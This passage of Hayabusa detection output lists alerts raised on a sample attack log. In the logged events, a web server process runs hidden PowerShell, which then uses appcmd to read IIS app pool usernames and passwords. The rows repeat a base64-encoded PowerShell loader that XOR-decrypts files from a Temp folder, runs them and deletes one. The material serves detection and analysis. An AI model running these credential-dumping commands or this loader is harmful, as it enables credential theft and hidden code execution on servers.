""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.000 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.110 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.190 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.270 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.350 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.581 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQA